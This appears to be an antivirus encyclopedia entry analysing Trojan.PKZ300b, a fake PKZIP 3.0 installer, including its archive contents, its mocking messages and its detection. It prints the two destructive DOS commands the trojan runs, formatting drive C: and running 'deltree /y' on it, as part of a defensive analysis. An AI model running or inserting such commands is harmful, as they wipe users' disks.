Trojan.Win32.PKZ300b

Class Trojan
Platform Win32
Description

Technical Details


The PKZIP300 is distributed as self-extracting archive named
PKZ300B.EXE, 178981 bytes of length.


This archive contains five files, after extracting they are:


filename len what’s that?
——– —- ————
PKZINST.EXE 5328 this is real trojan program
WHATSNEW.300 2417 WhatsNew from PkZip 2.04c, 2.04c replaced with 3.0
COMPRESS.000 124005 ARJ 2.41, plus extra bytes
COMPRESS.001 116260 ARJ 2.41
FILE_ID.DIZ 101 DOC file, announces that as Pkzip 3.0b.

There is only one file that is the trojan – PKZINST.EXE. It was written
in Turbo-Pascal. Being executed it displays the message:

PKZIP (R) Install Utility Version 3.00b 4-05-950
Copr. 1989-1995 Pkware Inc. All Rights Reserved.
Pkzip Reg. U.S. Pat. and Tm. Off.
Initializing, this may take a few minutes….

and executes two commands:

COMMAND.COM /C Format c: > NULL
COMMAND.COM /C deltree /y c: > NULL

Fortunately, the author of that trojan hasn’t enough of computer knowledge,
and the first command just waits for DOS confirmation:

WARNING: ALL DATA ON NON-REMOVABLE DISK
DRIVE C: WILL BE LOST!
Proceed with Format (Y/N)?

This request may be terminated either with reset, or with Ctrl-C/Break.
In both cases the trojan is terminated without any harm to data. In case of
Ctrl-C it just inform the uses:

Thanks for waiting, moron. You shouldn’t have fucked with us.

and returns to DOS.


There is one more bug in that trojan – redirection “> NULL” creates the
file NULL in the current directory, to disable any messages the virus
author had to write “> NUL”.


I see that the virus author learns DOS page-by-page in alphabetical order,
he knows how to use the commands that started with “D” and “F”, but he still
hasn’t reached “N” (Null) instructions while reading his DOS User’s Guide.


AVP detects that trojan with the name “Trojan.PKZ300b” in extracted
executable file, as well as in self-extracting archive.